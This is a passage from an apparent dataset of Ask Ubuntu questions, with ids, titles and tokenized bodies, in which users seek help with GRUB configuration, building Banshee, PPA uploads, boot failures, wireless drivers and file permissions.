grub-pc/install_devices_failed_upgrade : true * grub2/linux_cmdline_default : quiet splash grub-pc/postrm_purge_boot_grub : false grub-pc/hidden_timeout : true grub-pc/disk_description : grub-pc/mixed_legacy_and_grub2 : true grub2/kfreebsd_cmdline_default : quiet splash grub2/device_map_regenerated : * grub-pc/install_devices_failed : true grub-pc/chainload_from_menu.lst : true grub-pc/install_devices_disks_changed : grub2/kfreebsd_cmdline : note the line : grub-pc/install_devices : /dev/disk/by-id/dm-name-isw_cjccfdbihf_volume0 now the content of /etc/fstab : proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/isw_cjccfdbihf_volume01 / ext4 errors=remount-ro 0 1 /dev/mapper/isw_cjccfdbihf_volume0p5 none swap sw 0 0 an backup file from 2012 shows slightly different entries for swap ( volume05 instead of volume0p5 ) , which indicates that the names could have been changed : # note that this is an old file at the time the system was installed ( ubuntu 10.04 or 10.10 ) # ( this is also the time from which the original grub configuration is from , is n't it ? ! ) /dev/mapper/isw_cjccfdbihf_volume01 / ext4 errors=remount-ro 0 1 /dev/mapper/isw_cjccfdbihf_volume05 none swap sw 0 0 so , maybe it has something to do with `` _volume01 '' vs `` _volume0p1 '' vs `` _volume0 '' . /etc/fstab says `` 01 '' , ls /dev/mapper returns mappings `` 0p1 '' , `` 0p2 '' and `` 0p5 '' ( swap ) , and finally debconf-show grub-pc says `` volume0 '' . i think this inconsistency is the root of the problem . now i wonder : what should the line grub-pc/install_devices in the output of debconf-show grub-pc be ? how can i change the grub settings , so i can experiment with different values ? i also just noticed that the installation of grub-pc is broken : $ sudo dpkg-reconfigure grub-pc /usr/sbin/dpkg-reconfigure : grub-pc is broken or not fully installed
510437	how to build banshee 2.9.1 on ubuntu 14.04	i am trying to build banshee but i ca n't get it to compile . i used the banshee source tarball , and the banshee github code . here is a script on what i already did : # ! /bin/bash # dependencies sudo apt-get install aptitude sudo aptitude build-dep banshee sudo apt-get install git-core autoconf p7zip-full automake libtool intltool gcc make libgconf2.0-cil-dev libgconf2-dev boo libboo-cil-dev mono-gmcs libglib2.0-cil-dev libgstreamer1.0-dev gstreamer-1.0 libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev gtk-sharp2-gapi libdbus-glib1.0-cil-dev libmono-addins-cil-dev libgudev3.0-cil sqlite3 libsqlite3-dev libdbus-glib-1-dev libmtp-dev libgpod-cil-dev libmono-zeroconf-cil-dev libgtk-3-dev monodevelop libgudev3.0-cil* # downloading # wget http : //ftp.gnome.org/pub/gnome/sources/banshee/2.9/banshee-2.9.1.tar.xz # 7z x banshee-2.9.1.tar.xz # 7z x banshee-2.9.1.tar git clone git : //github.com/gnome/banshee.git cd banshee # dependencies : passed git clone git : //github.com/mono/gtk-sharp.git cd gtk-sharp ./autogen.sh make sudo make install cd .. # gstreamer-sharp-1.0 : passed git clone git : //github.com/inizan-yannick/gstreamer-sharp-1.0.git cd gstreamer-sharp-1.0 ./autogen.sh make sudo make install cd .. # taglib-sharp : passed git clone git : //github.com/mono/taglib-sharp.git cd taglib-sharp ./autogen.sh make sudo make install cd .. # configuring , make and installing banshee ./configure make sudo make install at this time i get the following error , when i make banshee . error cs0006 : metadata file `/usr/local/lib/cli/gstreamer-sharp-1.0/gstreamer-sharp.dll ' could not be found but the configure ; make ; sudo make install of gstreamer-sharp-1.0 passed without any issues . how to build banshee 2.9.1 on ubuntu 14.04
510438	how to replace files in ppa after unsuccessful build ?	i uploaded a package to my ppa , but the build failed . i made some corrections to the dependencies list and tried to upload the corrected file . it was rejected with this message : rejected : file -1.tar.gz already exists in , but uploaded version has different contents . see more information about this error in https : //help.launchpad.net/packaging/uploaderrors . files specified in dsc are broken or missing , skipping package unpack verification . i deleted the package from the ppa , and now it is absent in the list on the ppa webpage , but still i receive the same e-mail when trying to upload the new archive . so how is it supposed to be done correctly , when the build fails because of missing dependencies , and the packager corrects the dependencies list ?
510439	networking and sharing data	i have a tp_link tl-wr740n router and two pc and laptop and then ... how can i do network two or four computer with one router and use internet and sharing data between ones ? excuse me for bad grammar 's ! thanks
510441	connecting to secure webdav makes nautilus hang up	i just received a box.com account from my school and , since box sync does not exist for linux , i instead tried using the webdav service box.com offers . i tried the nautilus : file- > connect to server ... way . the connection works ; i can access the files on the box server . however , from the moment i connect to the server , nautilus takes ages to process any user input , both in and out of the webdav connection . as soon as i disconnect from the webdav server , it 's working again . any ideas on how to fix this ?
510446	how do i point programs to libraries that they require ?	i have this program that requires libbz2-1.0.so.1 . i recently downloaded the libsdl1.2 library for i386 which is what the program was saying it required before . when i attempt to run the program , however , it still responds saying that it does n't have the the other library libbz2-1.0 despite the fact that its in my /lib/x86_64-linux-gnu/libbz2.so.1 . kyle @ gamingpc : ~ $ /home/kyle/golly/powder-89.2-lin32/powder /home/kyle/golly/powder-89.2-lin32/powder : error while loading shared libraries : libbz2.so.1 : can not open shared object file : no such file or directory i guess i need to explicitly state where the required library is or something , which honestly seems very inefficient .
510447	tm package is not available ( for r version 3.0.2 ) in ubuntu 14.04 lts	since i upgrade my ubuntu to 14.04 lts version , i ca n't use the text mining package in r. > install.packages ( `` tm '' ) installing package into ‘/home/bruno/r/x86_64-pc-linux-gnu-library/3.0’ ( as ‘lib’ is unspecified ) warning message : package ‘tm’ is not available ( for r version 3.0.2 ) anyone can help me ?
510450	cant get odk vmdk file to run on esxi host vmware 5.1	i am running into a similiar issue , that gets farther when i remove that file , but doens't quite resolve . we purchased a buy as is odk vmdk file which works when you boot it up initially , the problem is for us to host it on our vmware esxi servers ( we are currently running 5.1 ) , we needed to convert it to 5.1 to run the vmdk file ( which seems to be similiar to cloneing because i am getting the same can not obtain ip address ) . ( this worked locally before the conversion ) . after failing to obtain one , eventually it will boot , i tried manually configuring the files ( it shows up with the manual ip addresses which are for my network , but does not allow users to access it ) eventually i found the solution you 're team is suggesting sudo rm -f /etc/udev/rules.d/70-persistent-net.rules then cloan ( in my case convert ) , and let it rebuild a new rule file upon bootup . this will allow it to accept the new ip addresses i give it , but will not allow it to navigate past it 's nic 192.168.0.133 , i can ping it 's loopback address and it 's ip address , but can not get outside the nic . i know the network is correct as every other device can communicate locally . just this host with the same information can not . something happens in vmwares eyes that is not saying that the nic is not valid and will not allow traffic through it , or recognize it as a valid address.. if i do a reboot of the nic it says it fails to reconfigure it and bring it up , however if i just do a power off eth0 then power up eth0 it brings it up , like i said before i can ping locally the ip address i get it , and i can ping the loopback address 127.0.0.1 . linux makes me feel really ignorant , why cant stuff just work !
510451	how to solve `` tmp could not be saved , because the disk , folder , or file is write-protected . ''	i tried to download pdf file from the web , but the following error message appear : tmp could not be saved , because the disk , folder , or file is write-protected . write-enable the disk and try again , or try saving in a different location . so what is the problem and how to solve ?
510452	make lubuntu open folders on the desktop with nautilus	i 've followed many threads and questions on how to replace pcmanfm with nautilus but still when i double-click a folder on the desktop it 's opened in pcmanfm . none seems to work . how do i make it use nautilus instead ? some of what i 've tried : editing /etc/xdg/lxsession/lxde/autostart editing ~/.config/openbox/lxde-rc.xml for shortcuts editing ~/.local/share/applications/mimeapps.list and /usr/share/applications/defaults.list right-clicking a folder , open with , open with ... , checking `` set selected application as default ... '' , choosing `` files '' , ok .
510454	anybody have experience with ubuntu + serva ?	i am setting up a serva server for ubuntu , per these instructions , and i ca n't seem to get ubuntu to load on my client machine . the config file ( from that link , which says it has been tested on ubuntu 14.04.1 desktop ) : asset = ubuntu lts 14.04 desktop live platform = amd64 kernel = nwa_pxe/ $ head_dir $ /casper/vmlinuz append = showmounts toram root=/dev/cifs initrd=nwa_pxe/ $ head_dir $ /casper/initrd.lz , nwa_pxe/ $ head_dir $ /casper/initrd_n11.gz boot=casper netboot=cifs nfsroot=// $ ip_bsrv $ /nwa_pxe_share/ $ head_dir $ nfsopts=-ouser=serva , pass=avres , ro ip=dhcp ro i changed the nfsopts=-ouser=serva , pass=avres part to nfsopts=-o user=theserver , password=p4ssw0rd because it had initially complained that -ouser was a bad option . theserver and p4ssw0rd are the username and password of the user account on the server machine ( windows 7 ) . i have also shared the appropriate serva folder , per the instructions . could someone take a look and see if it 's a problem with my config file ? or could someone with more experience tell me what i 'm doing wrong ?
510456	boot-repair ( or ubuntu grub ) somehow stopped bios setup	i am using ubuntu 14.04 since it launched . all of functioning of bios and grub where running properly . one day i used boot-repair for some reason . after few days i noticed that bios set-up doesnât start on hitting f2 ( samsung np300e5x-s01in ) . i did n't get the reason so i contacted service centre . due to some other problems , they changed my motherboard . hard-disk had windows 8 and ubuntu 14.04 installed before . with new motherboard , the grub got disappeared , windows 8 was starting directly and bios set-up started opening on f2 , i thought problem is solved . so , for getting grub to boot ubuntu , i live booted pendrive , installed boot-repair and ran recommended option . grub installed . it now give option for both os , but again not bios set-up does n't open on f2 . tried many times . on hitting f2 , it gets directed to bios . can anyone help me in understanding problem ? thanks in advance ...
510457	how do i get the value of display - > `` scale for menu and title bars : '' from the command line ?	i did a clean clean install of 14.04 and confirmed that display - > `` scale for menu and title bars : '' is set to 1 . however some uses of the application i develop report that its set to 0.875 on clean ubuntu installs . main question : how do i get the value of display - > `` scale for menu and title bars : '' from the command line ? i want my application to be able to check this value and response appropriately . i realize that my application should be scale agnostic , but its not , and in the short term i ca n't make it so . secondary question : if the default value of display - > `` scale for menu and title bars : '' can be different to 1 on a clean install , what factors effect this ?
510459	managing ubuntu 14.04 clients alternative landscape	we are migrating some windows pc 's to linux ( ubuntu 14.04 ) . for windows we have a tool to manage those devices : checking invetory on pc 's ( which software is installed ) pushing software to the clients ( batch / bash scripts ) taking over the pc's i saw that ubuntu has a tool called landscape . is there a free opensource alternative for this ? which is capable of the things i described ?
510465	libreoffice reinstall problems	how a tiny problem turned into a big one . summary of what i 've done so far : details are here i recently upgraded from kubuntu precise ( with backports , including the lo ppa ) to trusty with backports . i had been using the gong.wav file from the gallery for something else and it disappeared . my gallery had no sounds subdirectory in it at all . i got it back by manually installing an older version of lo in /opt - the main one is in /usr/lib - and copying the file to somewhere else . that created a sufficient mess so that , while lo seemed to work fine in general , clicking on gallery did nothing at all . next , i completely thoroughly uninstalled both versions ( without purge ) and reinstalled from the ppa . clicking on gallery in an empty writer document still does nothing . so , apparently , my install is broken - even after getting rid of everything except the config files . i do n't know what , if anything else , is missing or broken . how can i fix this ?
510466	intel wireless ac 7260 can not enter 802.11ac mode	i 'm trying to use intel wireless ac 7260 card to do some experiments in 802.11ac standard , but with the latest firmware ( version 22.24.8.0 ) , the card is now showing as 802.11abgn mode instead of ac . i have this 7260 card and an asus usb-ac56 card in my laptop , and after i type iwconfig , it looks like below : wlan1 ieee 802.11abgn essid : '' linksys_csi_5ghz '' mode : managed frequency:5.805 ghz access point : 94:10:3e:05 : f0:08 bit rate=216 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=67/70 signal level=-43 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:47 missed beacon:0 wlan2 ieee 802.11ac essid : '' linksys_csi_5ghz '' nickname : '' < wifi @ realtek > '' mode : managed frequency:5.805 ghz access point : 94:10:3e:05 : f0:08 bit rate:174 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off encryption key : off power management : off link quality=100/100 signal level=76/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 as you can see , the asus card is working as 802.11ac , while the intel 7260 is working as 802.11abgn . does anyone know how to resolve this problem and put intel 7260 to 802.11ac mode ? thank you very much for your time !
510470	ubuntu not booting properly after update - black screen with cursor	i was using quantal when i first installed ubuntu around march/april 2013 , but i was too lazy to update it until recently . after upgrading ( utopic ) , ubuntu would not start properly . i got the apparently common issue where it would stop at the purple screen after i select ubuntu in the grub menu . i tried just about every solution to this problem i found on this site , but none of them worked . this is what happens when i replace the $ linuxgfxmode with nomodeset and boot ubuntu : https : //www.youtube.com/watch ? v=zia9ofkbdnq ( for some reason my camera captured the purpleness as black , so disregard that ) as you can see , when i press the power button when i get to the black screen , the ubuntu boot screen appears briefly , then the computer shuts off . ubuntu was working fine for over a year when i first installed it , so i do n't know how i could just be missing some driver . i know this question looks redundant , but as i said , i 've tried almost every solution i could find ( sleep , replacing `` $ linuxgfxmode '' or `` quiet splash '' with `` nomodeset '' , startx and others ) , and all of them resulted in the same/similar thing seen in the video . on x86_64 . i 'm really not sure about my graphics card , when i run lshw or lspci all it says is `` pitcairn pro [ radeon hd 7800 series ] '' , not sure if that 's the exact model or what . sorry if that is n't enough information , i 'll be happy to give any more that 's needed . please do n't mark this as a duplicate of my computer boots to a black screen , what options do i have to fix it ? , i 've tried the solutions and none have worked .
510472	by mistake i removed python . terminal , music player , video player , software center etc . are gone	i work on ubuntu 14.04 to install python and other packages i entered the following command : sudo apt-get install python python-pip python-pyparsing python-mysqldb gunicorn nginx git-core ipython but i got many errors so to undo all i did : sudo apt-get remove python python-pip python-pyparsing python-mysqldb gunicorn nginx git-core ipython but it removed everything like terminal , music player , video player etc.. what should i do now to revert it ?
510473	usb dock for 4tb seagate hdd only works with less then 2.2tb of data	i have one of those seagate 4tb hd and everything went fine using gpt , i could use it normally without any problem . i used gparted to format and create the partition table as ext4 . everything changed as soon as i reach 2.2tb of data on the disk . after this point , i no longer could use it on my usb dock and everytime i try to use it , dmesg shows it as a 2.2tb drive : [ 787067.503166 ] sd 28:0:0:0 : [ sdc ] 4294967295 512-byte logical blocks : ( 2.19 tb/1.99 tib ) but , if i plug it right onto my internal sata port it works nicely . the same happens if i try to use the e-sata port from the usb dock .
510474	it is about apache server , is it right or wrong what i have done ?	i had a question in this article and i did not have the answer i want but i managed to do this : in etc/apache2/sites-avaiable/000-default.conf i changed the documentroot from /var/www/html to var/www now localhost through the browser opens www i can see the html folder and the test site folder i want , now i can act for every folder as a separate site as i do in windows so the question is what is the difference between what i have done and the ten steps way that every body trying to explain to add more sites to apache and what is the benefits of these both ways ?
510477	recommended root permissions	i think i may have gone overboard with sudo chmod -r , and i ca n't open a large variety of programs ! i 'm in the root directory at the moment , looking at the following subdirectories : drwxr-xr-x 2 root root 4096 jun 8 22:00 bin drwxr-xr-x 3 root root 4096 jun 8 22:01 boot drwxr-xr-x 2 root root 4096 oct 11 2013 cdrom drwxr-xr-x 15 root root 4100 aug 12 21:41 dev -rw-r -- r -- 1 starkers starkers 24853275 jan 30 2012 downloads drwxr-xr-x 154 root root 12288 aug 12 21:57 etc drwsr-sr-x 4 666 root 4096 jun 16 21:13 home lrwxrwxrwx 1 root root 33 jun 8 22:01 initrd.img - > boot/initrd.img-3.11.0-23-generic lrwxrwxrwx 1 root root 34 jun 8 22:00 initrd.img.old - > /boot/initrd.img-3.11.0-23-generic drwxr-xr-x 24 root root 4096 jul 18 11:12 lib drwxr-xr-x 2 root root 4096 jul 18 11:12 lib32 drwxr-xr-x 2 root root 4096 jan 9 2014 lib64 drwx -- -- -- 2 root root 16384 oct 11 2013 lost+found drwxr-xr-x 4 root root 4096 oct 30 2013 media drwxr-xr-x 4 root root 4096 nov 4 2013 mnt drwxr-xr-x 7 root root 4096 jul 18 11:12 opt dr-xr-xr-x 361 root root 0 aug 12 21:40 proc drwx -- -- -- 7 root root 4096 apr 9 18:01 root drwxr-xr-x 29 root root 920 aug 12 21:41 run drwxr-xr-x 2 root root 12288 jun 8 21:59 sbin drwxr-xr-x 2 root root 4096 apr 24 2013 srv dr-xr-xr-x 13 root root 0 aug 12 21:41 sys drwxr-xr-x 9 666 root 12288 aug 12 21:49 tmp drwxr-xr-x 11 root root 4096 jul 18 11:12 usr drwxr-xr-x 15 root root 4096 jan 9 2014 var lrwxrwxrwx 1 root root 30 jun 8 22:01 vmlinuz - > boot/vmlinuz-3.11.0-23-generic lrwxrwxrwx 1 root root 30 jun 8 22:00 vmlinuz.old - > boot/vmlinuz-3.11.0-23-generic what is the recommended permissions for these folders ? 0666 for everything ? i 'm hoping tochmod -r each back into working order .
510479	install ubuntu in chromebox samsung	i am following this guide to install ubuntu on my samsung chomebox dual boot chrome and ubuntu i have trouble with step 3 is that the example places the chromebox asus and i have the samsung which is an older version . not how to write-protect the firmware to be disabled my version is like this samsung series 3 chromebox www.chromium.org/chromium-os/developer-information-for-chrome-os-devices/samsung-sandy-bridge
510481	is there a convenient way to change the brightness at night in ubuntu ?	i know the settings menu , but is there some more convenient way ( maybe with an addon ) ?
510482	nothing appearing after login ( 14.04 )	this has happened to me more than once , i installed updates before shutting down , and later after i boot up and log in , i only see my desktop background and the mouse cursor , i ca n't do ctl+alt+t for a terminal either . i 've literally tried everything from countless forum posts , but it has n't done a thing . it has happened to me twice before this , and the only way to fix it has been to do a full-reinstall , but i really do n't feel like spending hours/days getting back all my programs and files .
510483	partioning guide for manually installing ubuntu	i am installing ubuntu 14.04 64bit `` trusty tahr '' on my dell inspiron laptop alongside my windows 8 . the laptop has an i7 processor with 8.0 gb of ram ( 7.87 of which is usuable ) i have 100gb of unallocated free space on my hard drive set aside for my ubuntu installation and can add more if completely necessary or recomended . i want to know what is the best way to divide this 100gb of hard drive between root , home , and swap partitions so that my operating system will work most efficiently . thanks ,
510485	enable seamless mode for kalilinux	i'am in ubuntu 14.04 , windows 2012 work fine with seamless mode in virtualbox but kalilinux the seamless mode is disable . i had install guest additions and enable 3d and 2d acceleration .
510486	battery & fan issue	system asus n56vj ubuntu 14.04 - 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux issue : sometimes when i start up my laptop , the fan turns on at full power and the battery indicator flashes red like the battery is empty , and that does n't change even though the power cable is connected . note : this happens with the power cable connected and disconnected as well . the only way to solve this so far , is shutting down the system and starting it again , restart does n't work . thanks in advance and best regards dima
510487	samba could not change the permissions of folder `` network ''	i 'm currently trying to set up samba , and upon creating my first share , it asked if i wanted to set permissions automatically , and i said yes , and then i got an error saying `` could not change the permissions of folder 'network ' '' is there something i did wrong ? it 's a whole hard drive that i 'm trying to share . the format is exfat , and it 's been set up to mount automatically .
510498	why is gimp not included in the installation image by default , despite the fact that canonical no longer tries to shrink their iso to a cd 's volume ?	why is gimp no longer included in the installation image by default , despite the fact that canonical has moved away from trying to make the image fit on a 700mb volume ?
510500	update virtualbox to install extension pack	i installed virtual box via the software center on the latest fully updated ubuntu 64bit . i wanted to install the extension pack for virtualbox but there is no version for my version of virtual box . i have virtualbox 4.3.10 installed ( as seen in help / about virtualbox ) . here are only extension packages for use with other versions downloadable . any suggestion what to do now ? i do n't want to deinstall virtualbox and install the latest version over the website because this could be bad for future upgrades ( could it ? pretty new with ubuntu ) .
510506	how can i allow anyone to read/write files on a usb stick ?	i 've got a usb stick which is only used on ubuntu machines , so is formatted ext4 . the users on my machines have various user ids , which means that a file created by a user on one wo n't necessarily be readable by a user on another , and directories wont necessarily be writable by the same token . the only way i 've currently found around this is to run sudo chmod -r 777 /media/username/usbstick before unmounting , each time i create a new file or directory . is there a better way to do this , which will ensure anything put on removable devices is globally read/writable by default ?
510508	ubuntu desktop module	i 'm new with vps i have now a ubuntu 14.04 lts server , i connected to the server with remote desktop from windows , but now i just see the terminal . is there a way to see a desktop ( see below image ) instead of just a terminal .
510510	14.04 installation crashed - now machine is dead	i was half way through an upgrade from 12.04 to 14.04 when my machine crashed . at this point it had been running for over an hour doing the upgrade so i have no idea what caused it . i was merrily reading a book when the machine just rebooted . i am pretty convinced it was only about one third done with the upgrade . unfortunately it did not even get to the login screen after the reboot . background goes black-grey and it just hangs - no hotkeys work - nothing . i have just booted from cd with a very old version ( 10.10 ) and managed to get to the internet to ask this question . is there any way i can 're-do ' or 'continue ' the upgrade from the cd boot , or do i have to wipe my primary partition and start from scratch ?
510512	usb ca n't read configurations , error -71 ?	i 'm trying to plug a custom development board based on a beaglebone black to my linux pc . the following is the dmesg error i was able to get ( running ubuntu 12.04 ) : [ 424595.900132 ] usb 5-2 : new full-speed usb device number 4 using uhci_hcd [ 424596.075024 ] usb 5-2 : unable to read config index 0 descriptor/all [ 424596.075032 ] usb 5-2 : ca n't read configurations , error -71 [ 424596.188220 ] usb 5-2 : new full-speed usb device number 5 using uhci_hcd [ 424596.251145 ] usb 5-2 : unable to read config index 0 descriptor/all [ 424596.251158 ] usb 5-2 : ca n't read configurations , error -71 [ 424596.364184 ] usb 5-2 : new full-speed usb device number 6 using uhci_hcd [ 424596.422150 ] usb 5-2 : unable to read config index 0 descriptor/all [ 424596.422164 ] usb 5-2 : ca n't read configurations , error -71 [ 424596.423023 ] hub 5-0:1.0 : unable to enumerate usb device on port 2 i 've been looking around to see if i can find any information on this error , but i 've found very little . does anyone have any idea what this error means ? since this is an exercise to get ethernet over usb0 working , our board has nothing programmed on flash and we are not using an sd card . any information will help . thanks
510513	issues after upgrading to ubuntu 14.04 from 13.10	after getting the no more support message i upgraded from 13.10 to 14.04 it seemed to go fine but after about a minute the computer rebooted then there after it would reboot every 30 sec.-2 minutes . it does not even give time to backup my data so that i can reinstall to 13.10
510514	will ubuntu phone edition work with snapdragon cpus ?	i have been following the project for a while now and i have been refurbishing pcs with ubuntu for years now . because of what i 've seen of ubuntu , i would love to see it go further into the mobile world . does anyone know what cpus will be supported ? all the official page says for the supercomputer edition is a cortex a9 or atom .
510515	how to perform partition on a drive where ubuntu is installed ?	i have only one drive with 461.81gb and want to shrink the volume by 300 gb , and create another two volumes using that space ... how do i do that using gparted ? ?
510516	how to verify zswap running ?	how can i check to verify that zswap is enabled and working on my system ?
510517	upgrade 13.04 to 13.10 - packages now unavailable	i 'm trying to follow these instructions ubuntu servers ( recommended ) install update-manager-core if it is not already installed : sudo apt-get install update-manager-core launch the upgrade tool : do-release-upgrade follow the on-screen instructions . to upgrade a 13.04 box to 13.10 , but i ca n't even get update-manager-core installed at this point . any ideas how to proceed ? i really do n't want to rebuild the box from scratch if it can be avoided . here 's the output from the attempt to install update-manager-core nathan @ nasty-vault : ~ $ sudo apt-get install update-manager-core reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : python3-update-manager the following packages will be upgraded : python3-update-manager update-manager-core 2 upgraded , 0 newly installed , 0 to remove and 120 not upgraded . need to get 39.0 kb of archives . after this operation , 4,096 b disk space will be freed . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! python3-update-manager update-manager-core install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ raring-updates/main python3-update-manager all 1:0.186.2 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com/ubuntu/ raring-updates/main update-manager-core all 1:0.186.2 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/u/update-manager/python3-update-manager_0.186.2_all.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.186.2_all.deb 404 not found [ ip : 91.189.91.14 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i 've run apt-get update which also complains at this point with these types of errors err http : //us.archive.ubuntu.com raring-backports/universe i386 packages 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com raring-backports/multiverse i386 packages 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/source/sources 404 not found [ ip : 91.189.91.14 80 ]
510518	external-hdd installation through live-usb	install 14.04 through live usb to external-hdd on asus 105e-ds02 , currently running 12.04 with broken wifi . the 8gb live usb and 3 dvds from prizx will provide the software . have read through many answers and web sites , did note the need for internet connection which is not available until thats fixed . hoping that wifi atheros ath9k , internal , external ralink and external rt2800usb realtek rtl8192 are included in the software . the wifi issue is a seperate question ( awaiting answers ) . either way i wish to fix 12.04 and install 14.04 on external-hdd . the external-hdd is recognised in 12.04 , and there appears to the ability to boot external drive ( recognised wd passport ( 750 gb ) as such in bios ) and to boot bootable ( live ) usb ( also in bios ) any additional help will be much appreciated . sure miss my now gone linux/bsd library and four servers .
510520	software recommendation to enable viewing of windows format picture images in ubuntu	i have a cd with medical images from a recent testing procedure , but it says windows xp or newer is required . i do not have any windows pc available - we have mac and ubuntu . is there some software i can install to make the cd images viewable ?
510532	restore disk partitions	i was working on my freshly installed ubuntu for a few days straight and suddenly it suddenly froze . after restarting i got a few of these errors : mount : mounting /dev on /root/dev failed : no such file or directory i restarted it again with no result and now i 'm on a live cd . this is what i see : i ran the 'gpart ' command , but i have n't executed the sudo gpart -w /dev/sda /dev/sda command yet not to cause any permanent damage . is there anything i can do to get back these partitions ?
510533	suspend and hibernate not working and freezing ubuntu 14.04	i 've just upgraded to ubuntu 14.04 and had some problems with suspend and hibernate . when i try to wake up from suspend the screen freezes on the login and the only thing that i can do is move the mouse around , until it freezes too . and when i try to test hibernation using the command 'sudo pm-hibernate ' my screen turns off and on , but with everything freezed thank you guys !
510534	installing ubuntu 14 on windows 8 with virtual box 4.1.34	i 'm a first user to ubuntu.i 'm installing ubuntu on my desktop . i tried to install ubuntu 14 on window 8 with oracle vm box 4.3 . when i tried to start i got the error message and after googling i found that vm box 4.3 have issues with windows 8 . i decided to uninstall and thought i 'll try older versions of virtualbox 4.1.34 . i 'm getting the same error message : the error message : error re-launching virtual box 5 . any help would be appreciated . my apologizes if this question has been posted earlier . if so , could someone point me to the correct link . thanks for your help !
510539	install mini pcie in jetson tk1	i 'm trying to run my wireless adapter in my embedded computer running ubuntu 14.04 ( nvidia 's jetson tk1 kernel : 3.10.24 ) . the adapter is a minipcie board 7260 hmw . i was thinking that ubuntu did n't have the correct drivers and tried unsuccessfully to install iwlwifi . later i discovered that under /lib/firmware i had three interesting files : iwlwifi-7260-7.ucode iwlwifi-7260-8.ucode iwlwifi-7260-9.ucode these files made me think that iwlwifi is already installed . then , i ran `` lspci -v '' . result : network controller_ intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation dual band wireless-ac 7260 flags : bus master , fast devsel , latency 0 , irq 130 memory at 32200000 ( 64 bit , non-prefetchable ) [ size = 8k ] capabilities : < access denied > the last line intrigues me and `` kernel driver in use '' is not displayed . so , my best guess is that i only have to add permissions and assign a driver that is already available in my computer , but how do i do that ? if i 'm wrong , i 'd appreciate your assistance .
510540	windows 7 drive not showing in bios boot menue after ubuntu install	i 've looked through many problem solving techniques for similar problems , but with my set-up it appears none of them are quite relevant . my computer is a hp envy phoenix with 3 drives installed : 128gb ssd which my windows is installed on , 2tb drive which i generally install programs on and use for storage and a 1tb ( previously completely empty ) drive of which i recently installed ubuntu 14.04 on . the issue i am now faced with is that the bios menu is no longer showing the 128gb drive to boot off at all , meaning my windows drive has completely vanished . funny thing is , when i use gparted or even go to re-install ubuntu , the 128gb drive appears . ( although in the ubuntu installer it does n't show it to be the host to windows os ) . when i installed ubuntu , i installed it on the previously stated 1tb completely clean drive and did not do anything to any of the other drives . i split it in half , using half for the ubuntu os and the other half for the prerequisite `` swap '' section . the windows os does not show up in the grub 2 either . i feel the issue is that windows is booted on legacy and ubuntu boots on uefi , yet in the bios the drive does n't even appear under the legacy tree . does anyone know how i can boot windows 7 again ( without re-installing/doing the fix with a windows 7 installation disk ) ? now , on a different thread , it is said that i have `` mixed '' bios installs and are best to re-install one of the os 's so that they are both on the same bios . which begs the question to me ( not being able to navigate the ubuntu installer efficiently ) how do i install ubuntu on the correct bios setting ? thank you for your time edit : i have re-installed ubuntu onto the drive with a 16gb /boot area and a 16gb swap area . the rest of the drive is now for ubuntu .
510543	resize multiple files and rename them properly	i have a command line problem - probably a pretty easy one , but it seems i ca n't enter the right words into google . so i want to resize all *.png images in the folder using imagemagick - this would be something like `` convert -resize 80 % `` and i want `` filename '' â `` small_filename '' so i tried : for f in *.png ; convert -resize 80 % `` $ f '' `` small_ $ f '' ; done but `` syntax error near unexpected token `convert '' - i suppose you ca n't just import imagemagick commands into the bash ? i would be delighted if you could help .
510544	hard drive recovery after windows partitions wiped by ubuntu install	i had ubuntu 13 , 32 bit installed along side windows 8 , and was dual booting them from my dell inspiron laptop . i then used a usb with 64 bit ubuntu 14.04 on it , and used it to update my old ubuntu . the command window came up and same delete and replace ubuntu 13 , so i proceeded with the update . i have now realised it has completely wiped my computer , so now i only have ubuntu 14.04 , and have lost windows 8 and all my files . is there anyway to revert to before i updated to the newer ubuntu .
510545	mouse events using built-ins	i bound almost every often used action to a keyboard shortcut . now the only left-overs are mouse buttons . i found out the codes using xev , but i 'm unaware of their proper usage . could anyone suggest a command to `` execute '' mouse clicks ? something built-in ( like xev ) is appreciated , because i do know about xdotool
510547	why do large files created with a2ps stop printing in the middle on my hp laserjet pro 400 ?	i converted an ascii file to a postscript file with this command : $ /usr/bin/a2ps -1 -- font-size 10 -- landscape -- sides 2 -- output $ home/out.ps myfile.txt it is 52 pages long and displays properly in ghostview . however , when i send it to my hp laserjet pro 400 printer ( model m451dn ) , printing in duplex mode , the file always stops printing after 30 pages ( 15 sheets ) . i tried with and without -- sides 2 in case some math mistake were the cause ( e.g. , dividing the page count in half ) . no change . when i then try to print only pages 31-52 ( from ghostview ) , i get only pages 31-40 . i can then print pages 41-52 . this does not happen with large files sent to the same printer from microsoft word . i 'm stumped . this is ubuntu 14.04.1 lts , running the latest version of the official hp printer driver ( hplip 3.14.6 ) . when the first 30 pages print , the laserjet displays `` cleaning '' and then the printing stops . there is no `` cleaning '' message after pages 31-40 or 41-52 . the printer has plenty of ram ( 128 mb ) . any advice appreciated ! ! !
